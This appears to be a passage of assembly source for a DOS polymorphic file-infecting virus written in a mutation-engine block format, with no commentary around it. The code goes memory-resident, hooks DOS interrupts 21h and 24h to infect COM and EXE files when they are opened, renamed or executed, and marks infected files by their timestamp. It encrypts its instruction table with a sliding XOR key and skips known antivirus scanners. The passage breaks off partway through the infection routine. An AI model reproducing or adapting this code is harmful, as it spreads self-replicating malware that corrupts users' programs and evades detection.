+ + mov al,cs:[si+02h] ; AL = last byte of original code ...
+ + db 04h ; Four bytes instruction
+ + mov cs:[100h+02h],al ; Store last byte of original code...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1390h ; Pointer to move_virus__
+ db 11101111b ; End of block
+ db 11101110b ; Beginning of block
+ dw 1774h
+ db 04h ; Four bytes instruction
+ + mov ax,[bp+1234h] ; AX = segment of PSP for current ...
+ + db 11101101b ; Data reference
+ dw 0befh ; Pointer to program_seg_
+ db 04h ; Four bytes instruction
+ + mov cx,[bp+1234h] ; CX = initial SS relative to star...
+ + db 11101101b ; Data reference
+ dw 138ah ; Pointer to initial_ss_
+ db 03h ; Three bytes instruction
+ + add cx,10h ; Add ten to initial SS relative t...
+ + db 02h ; Two bytes instruction
+ + add cx,ax ; Add segment of PSP for current p...
+ + db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save initial SP at stack
+ + db 11101101b ; Data reference
+ dw 138ch ; Pointer to initial_sp_
+ db 04h ; Four bytes instruction
+ + mov cx,[bp+1234h] ; CX = initial CS relative to star...
+ + db 11101101b ; Data reference
+ dw 1389h ; Pointer to initial_cs_
+ db 03h ; Three bytes instruction
+ + add cx,10h ; Add ten to initial CS relative t...
+ + db 02h ; Two bytes instruction
+ + add cx,ax ; Add segment of PSP for current p...
+ + db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save incorrect IP at stack
+ + db 11101101b ; Data reference
+ dw 1773h ; Pointer to incorrec_ip
+ db 01h ; One byte instruction
+ + push ax ; Save segment of PSP for current ...
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save size of memory block in par...
+ + db 11101101b ; Data reference
+ dw 1395h ; Pointer to mcb_size__
+ db 01h ; One byte instruction
+ + push ds ; Save DS at stack
+ + db 02h ; Two bytes instruction
+ + mov cl,00h ; COM executable
+ + db 04h ; Four bytes instruction
+ + cmp [bp+1234h],cl ; COM executable?
+ + db 11101101b ; Data reference
+ dw 1388h ; Pointer to executa_sta
+ db 01110101b+10000000b ; Not equal? Jump to move_virus__
+ dw 1390h ; Pointer to move_virus__
+ db 04h ; Four bytes instruction
+ + lea si,[bp+1234h] ; SI = offset of origin_code_
+ + db 11101101b ; Data reference
+ dw 1f40h ; Pointer to origin_code_
+ db 03h ; Three bytes instruction
+ + mov ax,cs:[si] ; AX = first two bytes of original...
+ + db 04h ; Four bytes instruction
+ + mov cs:[100h],ax ; Store first two bytes of origina...
+ + db 04h ; Four bytes instruction
+ + mov al,cs:[si+02h] ; AX = last byte of original code ...
+ + db 04h ; Four bytes instruction
+ + mov cs:[100h+02h],al ; Store last byte of original code...
+ + db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1390h ; Pointer to move_virus__
+ db 11101111b ; End of block
+move_virus__ db 11101110b ; Beginning of block
+ dw 1390h ; Block identification of move_vir...
+ db 02h ; Two bytes instruction
+ + xor ax,ax ; Zero AX
+ + db 02h ; Two bytes instruction
+ + mov ds,ax ; DS = segment of DOS communicatio...
+ + db 05h ; Five bytes instruction
+ + cmp byte ptr ds:[501h],10h
+ + db 01110100b+10000000b ; Already resident? Jump to virus_...
+ dw 65h ; Pointer to virus_exit_
+ db 05h ; Five bytes instruction
+ + mov byte ptr ds:[501h],10h
+ + db 01h ; One byte instruction
+ + push es ; Save ES at stack
+ + db 01h ; One byte instruction
+ + pop ds ; Load DS from stack (ES)
+ + db 03h ; Three bytes instruction
+ + mov ax,ds:[0ch] ; AX = offset within next virus ge...
+ + db 03h ; Three bytes instruction
+ + sub ax,4000h ; Subtract offset of next virus ge...
+ + db 04h ; Four bytes instruction
+ + mov [bp+1234h],ax ; Store offset of crypt_table
+ + db 11101101b ; Data reference
+ dw 0bf1h ; Pointer to vir_exit_of
+ db 04h ; Four bytes instruction
+ + mov cx,ds:[0eh] ; CX = length of virus
+ + db 04h ; Four bytes instruction
+ + mov [bp+1234h],cx ; Store length of virus
+ + db 11101101b ; Data reference
+ dw 0bf0h ; Pointer to virus_lengt
+ db 03h ; Three bytes instruction
+ + mov si,4000h ; SI = offset of next virus genera...
+ + db 02h ; Two bytes instruction
+ + xor di,di ; Zero DI
+ + db 02h ; Two bytes instruction
+ + rep movsb ; Move virus to top of memory
+ + db 02h ; Two bytes instruction
+ + mov cl,04h ; Divide by paragraphs
+ + db 02h ; Two bytes instruction
+ + shr di,cl ; DI = length of next virus genera...
+ + db 01h ; One byte instruction
+ + inc di ; Increase length of next virus ge...
+ + db 04h ; Four bytes instruction
+ + mov bx,[bp+1234h] ; BX = size of memory block in par...
+ + db 11101101b ; Data reference
+ dw 1394h ; Pointer to mcb_size___
+ db 04h ; Four bytes instruction
+ + sub bx,[bp+1234h] ; Subtract new size in paragraphs ...
+ + db 11101101b ; Data reference
+ dw 1393h ; Pointer to new_mcb_siz
+ db 02h ; Two bytes instruction
+ + sub bx,di ; Subtract length of next virus ge...
+ + db 01h ; One byte instruction
+ + dec bx ; Decrease new size in paragraphs
+ + db 01h ; One byte instruction
+ + dec bx ; Decrease new size in paragraphs
+ + db 02h ; Two bytes instruction
+ + cmp bx,di ; Insufficient memory?
+ + db 01110010b+10000000b ; Below? Jump to virus_exit_
+ dw 65h ; Pointer to virus_exit_
+ db 02h ; Two bytes instruction
+ + mov ah,4ah ; Resize memory block
+ + db 02h ; Two bytes instruction
+ + int 21h
+ + db 01110010b+10000000b ; Error? Jump to virus_exit_
+ dw 65h ; Pointer to virus_exit_
+ db 02h ; Two bytes instruction
+ + mov bx,di ; BX = number of paragraphs to all...
+ + db 02h ; Two bytes instruction
+ + mov ah,48h ; Allocate memory
+ + db 02h ; Two bytes instruction
+ + int 21h
+ + db 01110010b+10000000b ; Error? Jump to virus_exit_
+ dw 65h ; Pointer to virus_exit_
+ db 01h ; One byte instruction
+ + push ax ; Save AX at stack
+ + db 01h ; One byte instruction
+ + dec ax ; AX = segment of current Memory C...
+ + db 02h ; Two bytes instruction
+ + mov es,ax ; ES = segment of current Memory C...
+ + db 07h ; Seven bytes instruction
+ + mov word ptr es:[01h],08h
+ + db 01h ; One byte instruction
+ + pop es ; Load ES from stack (AX)
+ + db 04h ; Four bytes instruction
+ + mov cx,[bp+1234h] ; CX = length of virus
+ + db 11101101b ; Data reference
+ dw 0bf0h ; Pointer to virus_lengt
+ db 02h ; Two bytes instruction
+ + xor si,si ; Zero SI
+ + db 02h ; Two bytes instruction
+ + xor di,di ; Zero DI
+ + db 02h ; Two bytes instruction
+ + rep movsb ; Move virus to top of memory
+ + db 01h ; One byte instruction
+ + push es ; Save ES at stack
+ + db 04h ; Four bytes instruction
+ + push [bp+1234h] ; Save offset of virus_exit_ at stack
+ + db 11101101b ; Data reference
+ dw 0bf1h ; Pointer to vir_exit_of
+ db 04h ; Four bytes instruction
+ + mov al,[bp+1234h] ; AL = 8-bit encryption/decryption...
+ + db 11101101b ; Data reference
+ dw 0bd7h ; Pointer to crypt_key_
+ db 04h ; Four bytes instruction
+ + mov ah,[bp+1234h] ; AH = 8-bit sliding encrytion/dec...
+ + db 11101101b ; Data reference
+ dw 0bd8h ; Pointer to sliding_key_
+ db 01h ; One byte instruction
+ + retf ; Return far
+ + db 11101111b ; End of block
+terminate_ db 11101110b ; Beginning of block
+ dw 0beeh ; Block identification of terminate_
+ db 03h ; Three bytes instruction
+ + mov ax,4c00h ; Terminate with return code
+ + db 02h ; Two bytes instruction
+ + int 21h
+ + db 11101111b ; End of block
+get_rnd_num_ db 11101110b ; Beginning of block
+ dw 0bd4h ; Block identification of get_rnd_...
+ db 01h ; One byte instruction
+ + push cx ; Save CX at stack
+ + db 02h ; Two bytes instruction
+ + in al,40h ; AL = 8-bit random number
+ + db 02h ; Two bytes instruction
+ + mov ah,al ; AH = 8-bit random number
+ + db 02h ; Two bytes instruction
+ + in al,40h ; AL = 8-bit random number
+ + db 05h ; Five bytes instruction
+ + xor ax,es:[01h] ; AX = 16-bit random number
+ + db 02h ; Two bytes instruction
+ + mov cl,ah ; CL = high-order byte of 16-bit r...
+ + db 02h ; Two bytes instruction
+ + rol ax,cl ; AX = 16-bit random number
+ + db 04h ; Four bytes instruction
+ + mov es:[01h],ax ; Store 16-bit random number
+ + db 01h ; One byte instruction
+ + pop cx ; Load CX from stack
+ + db 01h ; One byte instruction
+ + ret ; Return
+ + db 11101111b ; End of block
+rnd_in_rang db 11101110b ; Beginning of block
+ dw 0bd5h ; Block identification of rnd_in_rang
+ db 02h ; Two bytes instruction
+ + or bp,bp ; Zero BP?
+ + db 01110100b+10000000b ; Zero? Jump to zero_range_
+ dw 0bd6h ; Pointer to zero_range_
+ db 01h ; One byte instruction
+ + push dx ; Save DX at stack
+ + db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0bd4h ; Pointer to get_rnd_num_
+ db 02h ; Two bytes instruction
+ + xor dx,dx ; Zero DX
+ + db 02h ; Two bytes instruction
+ + div bp ; DX = random number within range
+ + db 01h ; One byte instruction
+ + xchg ax,dx ; AX = random number within range
+ + db 01h ; One byte instruction
+ + pop dx ; Load DX from stack
+ + db 01h ; One byte instruction
+ + ret ; Return
+ + db 11101111b ; End of block
+zero_range_ db 11101110b ; Beginning of block
+ dw 0bd6h ; Block identification of zero_range_
+ db 02h ; Two bytes instruction
+ + xor ax,ax ; AX = random number within range
+ + db 01h ; One byte instruction
+ + ret ; Return
+ + db 11101111b ; End of block
+decrypt_byt db 11101110b ; Beginning of block
+ dw 0be0h ; Block identification of decrypt_byt
+ db 04h ; Four bytes instruction
+ + mov [bp+1234h],ah ; Store AH
+ + db 11101101b ; Data reference
+ dw 0bd9h ;
Pointer to ah__ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset within table + + db 02h ; Two bytes instruction + + sub ax,bp ; Subtract delta offset from offse... + + db 03h ; Three bytes instruction + + sub ax,1234h ; Subtract offset of tmc_table_ fr... + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 04h ; Four bytes instruction + + mul word ptr [bp+1234h] ; AL = 8-bit sliding encryptio... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 04h ; Four bytes instruction + + add al,[bp+1234h] ; AL = 8-bit encryption/decryption... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 02h ; Two bytes instruction + + xor al,[si] ; AL = byte of decrypted table + + db 04h ; Four bytes instruction + + mov ah,[bp+1234h] ; AH = stored AH + + db 11101101b ; Data reference + dw 0bd9h ; Pointer to ah__ + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +decrypt_id_ db 11101110b ; Beginning of block + dw 0be1h ; Block identification of decrypt_id_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + mov ah,al ; AL = byte of decrypted table + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + xchg al,ah ; AL = byte of decrypted table + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +virus_exit_ db 11101110b ; Beginning of block + dw 65h ; Block identification of virus_exit_ + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 02h ; Two bytes instruction + + mov ah,49h ; Free memory + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = 
segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov es,ax ; DS = segment of PSP for current ... + + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 04h ; Four bytes instruction + + lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ + + db 11101101b ; Data reference + dw 1391h ; Pointer of jmp_imm32_ + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial IP) + + db 04h ; Four bytes instruction + + mov cs:[bx+01h],ax ; Store initial IP + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial CS ...) + + db 04h ; Four bytes instruction + + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial SP) + + db 01h ; One byte instruction + + pop ss ; Load SS from stack (initial SS ...) + + db 02h ; Two bytes instruction + + mov sp,ax ; SP = stack pointer + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1391h ; Pointer of jmp_imm32_ + db 11101111b ; End of block +jmp_imm32_ db 11101110b ; Beginning of block + dw 1391h ; Block identification of jmp_imm32_ + db 05h+10h ; Five bytes data + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory + db 11101111b ; End of block +ah__ db 11101110b ; Beginning of block + dw 0bd9h ; Block identification of ah__ + db 01h+10h ; One byte data + db 00h ; Accumulator register (high-orde...) + db 11101111b ; End of block +probability_ db 11101110b ; Beginning of block + dw 0bech ; Block identification of probabil... + db 02h+10h ; Two bytes data + dw 32h ; Probability + db 11101111b ; End of block +crypt_key_ db 11101110b ; Beginning of block + dw 0bd7h ; Block identification of crypt_key_ + db 01h+10h ; One byte data + db 00h ; 8-bit encryption/decryption key + db 11101111b ; End of block +sliding_key_ db 11101110b ; Beginning of block + dw 0bd8h ; Block identification of sliding_... 
+ db 02h+10h ; Two bytes data + dw 00h ; 8-bit sliding encryption/decrypt... + db 11101111b ; End of block +executa_sta db 11101110b ; Beginning of block + dw 1388h ; Block identification of executa_sta + db 01h+10h ; One byte data + db 00h ; Executable status + db 11101111b ; End of block +origin_code_ db 11101110b ; Beginning of block + dw 1f40h ; Block identification of origin_c... + db 03h+10h ; Three bytes data + db 11000011b,00000010b dup(00h) + db 11101111b ; End of block +initial_cs_ db 11101110b ; Beginning of block + dw 1389h ; Block identification of initial_cs_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial CS relative to start of ... + db 11101111b ; End of block +initial_ss_ db 11101110b ; Beginning of block + dw 138ah ; Block identification of initial_ss_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial SS relative to start of ... + db 11101111b ; End of block +initial_ip_ db 11101110b ; Beginning of block + dw 138bh ; Block identification of initial_ip_ + db 02h+10h ; Two bytes data + dw 100h ; Initial IP + db 11101111b ; End of block +incorrec_ip db 11101110b ; Beginning of block + dw 1773h ; Block identification of incorrec_ip + db 02h+10h ; Two bytes data + dw 100h ; Incorrect IP + db 11101111b ; End of block +initial_sp_ db 11101110b ; Beginning of block + dw 138ch ; Block identification of initial_sp_ + db 02h+10h ; Two bytes data + dw 0fffeh ; Initial SP + db 11101111b ; End of block +new_mcb_siz db 11101110b ; Beginning of block + dw 1393h ; Block identification of new_mcb_siz + db 02h+10h ; Two bytes data + dw 1000h ; New size in paragraphs + db 11101111b ; End of block +mcb_size__ db 11101110b ; Beginning of block + dw 1395h ; Block identification of mcb_size__ + db 02h+10h ; Two bytes data + dw 0ffffh ; Size of memory block in paragraphs + db 11101111b ; End of block +mcb_size___ db 11101110b ; Beginning of block + dw 1394h ; Block identification of mcb_siz... 
+ db 02h+10h ; Two bytes data + dw 00h ; Size of memory block in paragraphs + db 11101111b ; End of block +program_seg_ db 11101110b ; Beginning of block + dw 0befh ; Block identification of program_... + db 02h+10h ; Two bytes data + dw 00h ; Segment of PSP for current process + db 11101111b ; End of block +virus_lengt db 11101110b ; Beginning of block + dw 0bf0h ; Block identification of virus_lengt + db 02h+10h ; Two bytes data + dw 00h ; Length of virus + db 11101111b ; End of block +vir_exit_of db 11101110b ; Beginning of block + dw 0bf1h ; Block identification of vir_exit_of + db 02h+10h ; Two bytes data + dw 00h ; Offset of virus_exit_ + db 11101111b ; End of block +tmc_table_ db 11101110b ; Beginning of block + dw 4c5h ; Block identification of tmc_table_ + db 11101111b ; End of block + db 00h ; End of table +second_table db 11101111b ; End of block +virus_end: +crypt_table db 11101110b ; Beginning of block + dw 66h ; Block identification of crypt_table + db 02h ; Two bytes instruction + + xor bp,bp ; BP = delta offset + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store 8-bit encryption/decryptio... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... 
+ + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 03h ; Three bytes instruction + + mov ax,3521h ; Get interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of int21_jump + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_jump + db 03h ; Three bytes instruction + + mov [di+01h],bx ; Store offset of interrupt 21h + + db 03h ; Three bytes instruction + + mov [di+03h],es ; Store segment of interrupt 21h + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int21_virus + + db 11101101b ; Data reference + dw 0c8h ; Pointer to int21_virus + db 03h ; Three bytes instruction + + mov ax,2521h ; Set interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 65h ; Pointer to virus_exit_ + db 11101111b ; End of block +crypt_table_ db 11101110b ; Beginning of block + dw 0bfeh ; Block identification of crypt_ta... + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(code_end-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bffh ; Pointer to crypt_loop + db 11101111b ; End of block +crypt_loop db 11101110b ; Beginning of block + dw 0bffh ; Block identification of crypt_lo... + db 02h ; Two bytes instruction + + xor [si],al ; Encrypt byte of table + + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 02h ; Two bytes instruction + + add al,ah ; Add 8-bit sliding encryption key... + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? 
Jump to crypt_loop + dw 0bffh ; Pointer to crypt_loop + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +int21_virus db 11101110b ; Beginning of block + dw 0c8h ; Block identification of int21_virus + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 03h ; Three bytes instruction + + cmp ah,4bh ; Load and/or execute program? + + db 01110100b+10000000b ; Equal? Jump to find_zero + dw 1392h ; Pointer to find_zero + db 03h ; Three bytes instruction + + cmp ah,56h ; Rename file? + + db 01110100b+10000000b ; Equal? Jump to find_zero + dw 1392h ; Pointer to find_zero + db 03h ; Three bytes instruction + + cmp ah,3dh ; Open file? + + db 01110101b+10000000b ; Not equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1392h ; Pointer to find_zero + db 11101111b ; End of block +find_zero db 11101110b ; Beginning of block + dw 1392h ; Block identification of find_zero + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (DS) + + db 02h ; Two bytes instruction + + mov di,dx ; DI = offset of filename + + db 03h ; Three bytes instruction + + mov cx,43h ; CX = number of bytes to search t... + + db 02h ; Two bytes instruction + + xor al,al ; Zero AL + + db 02h ; Two bytes instruction + + repne scasb ; Find end of filename + + db 01110101b+10000000b ; Not equal? 
Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + lea si,[di-05h] ; SI = offset of the dot in the fi... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + mov bx,'mo' ; COM executable + + db 03h ; Three bytes instruction + + cmp ax,'c.' ; COM executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 03h ; Three bytes instruction + + mov bx,'ex' ; EXE executable + + db 03h ; Three bytes instruction + + cmp ax,'e.' ; EXE executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fbh ; Pointer to int21_exit + db 11101111b ; End of block +examine_ext db 11101110b ; Beginning of block + dw 0f0h ; Block identification of examine_ext + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 02h ; Two bytes instruction + + cmp ax,bx ; COM or EXE executable? + + db 01110101b+10000000b ; Not equal? Jump to examine_ext + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + sub si,04h ; SI = offset of the dot in the fi... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1398h ; Pointer to find_name + db 11101111b ; End of block +find_name db 11101110b ; Beginning of block + dw 1398h ; Block identification of find_name + db 01h ; One byte instruction + + dec si ; SI = offset within filename + + db 02h ; Two bytes instruction + + mov al,[si] ; AL = byte of filename + + db 02h ; Two bytes instruction + + cmp al,'/' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp al,'\' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? 
Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp al,':' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp si,dx ; Beginning of filename? + + db 01110111b+10000000b ; Above? Jump to find_name + dw 1398h ; Pointer to find_name + db 01h ; One byte instruction + + dec si ; SI = offset within filename + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1397h ; Pointer to examine_name + db 11101111b ; End of block +examine_name db 11101110b ; Beginning of block + dw 1397h ; Block identification of examine_... + db 01h ; One byte instruction + + inc si ; SI = offset of beginning of file... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + xor ax,0aa55h ; Encrypt two bytes of filename + + db 03h ; Three bytes instruction + + cmp ax,('ci' xor 0aa55h) + + db 01110100b+10000000b ; Equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('on' xor 0aa55h) + + db 01110100b+10000000b ; NOD-iCE? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('ew' xor 0aa55h) + + db 01110100b+10000000b ; Dr. Web? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('bt' xor 0aa55h) + + db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ... + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('va' xor 0aa55h) + + db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i... + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('-f' xor 0aa55h) + + db 01110100b+10000000b ; F-PROT? 
Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('cs' xor 0aa55h) + + db 01110100b+10000000b ; McAfee ViruScan? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('oc' xor 0aa55h) + + db 01110100b+10000000b ; COMMAND.COM? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('iw' xor 0aa55h) + + db 01110100b+10000000b ; WIN.COM? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 03h ; Three bytes instruction + + cmp ax,('rk' xor 0aa55h) + + db 01110100b+10000000b ; Equal? Jump to int21_exit + dw 0fbh ; Pointer to int21_exit + db 02h ; Two bytes instruction + + mov cx,ds ; CX = segment of filename + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 03h ; Three bytes instruction + + mov ax,3524h ; Get interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int24_virus + + db 11101101b ; Data reference + dw 1770h ; Pointer to int24_virus + db 03h ; Three bytes instruction + + mov ax,2524h ; Set interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 02h ; Two bytes instruction + + mov ds,cx ; DS = segment of filename + + db 02h ; Two bytes instruction + + mov es,cx ; ES = segment of filename + + db 03h ; Three bytes instruction + + mov ax,3d02h ; Open file (read/write) + + db 03h ; Three bytes instruction + + mov bx,1234h ; BX = offset of int21_jump + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_jump + db 01h ; One byte instruction + + inc bx ; BX = offset of 
address of interr... + + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 03h ; Three bytes instruction + + call dword ptr cs:[bx] + + db 01110010b+10000000b ; Error? Jump to int24_store + dw 1771h ; Pointer to int24_store + db 02h ; Two bytes instruction + + mov bx,ax ; BX = file handle + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + mov ax,5700h ; Get file's date and time + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 04h ; Four bytes instruction + + mov ds:[1234h],dx ; Store file's date + + db 11101101b ; Data reference + dw 12dh ; Pointer to file_date + db 02h ; Two bytes instruction + + mov al,cl ; AL = low-order byte of file time + + db 02h ; Two bytes instruction + + and al,00011111b ; AL = file seconds + + db 02h ; Two bytes instruction + + cmp al,00000100b ; Already infected (8 seconds)? + + db 01110100b+10000000b ; Equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + and cl,11100000b ; Zero file seconds + + db 03h ; Three bytes instruction + + or cl,00000100b ; Set infection mark (8 seconds) + + db 04h ; Four bytes instruction + + mov ds:[1234h],cx ; Store file's time + + db 11101101b ; Data reference + dw 12ch ; Pointer to file_time + db 02h ; Two bytes instruction + + mov ah,3fh ; Read from file + + db 03h ; Three bytes instruction + + mov cx,03h ; Read three bytes + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 02h ; Two bytes instruction + + mov si,dx ; SI = offset of origin_code_ + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? 
Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + lodsw ; AX = EXE signature + + db 03h ; Three bytes instruction + + cmp ax,'ZM' ; EXE signature? + + db 01110100b+10000000b ; Equal? Jump to infect_exe + dw 138dh ; Pointer to infect_exe + db 03h ; Three bytes instruction + + cmp ax,'MZ' ; EXE signature? + + db 01110100b+10000000b ; Equal? Jump to infect_exe + dw 138dh ; Pointer to infect_exe + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_cs_ + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 04h ; Four bytes instruction + + mov [si],0fff0h ; Store initial CS relative to sta... + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_ss_ + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 04h ; Four bytes instruction + + mov [si],0fff0h ; Store initial SS relative to sta... + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_ip_ + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial IP + db 04h ; Four bytes instruction + + mov [si],100h ; Store initial IP + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of initial_sp_ + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 04h ; Four bytes instruction + + mov [si],0fffeh ; Store initial SP + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of mcb_size__ + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 04h ; Four bytes instruction + + mov [si],0ffffh ; Store size of memory block in pa... 
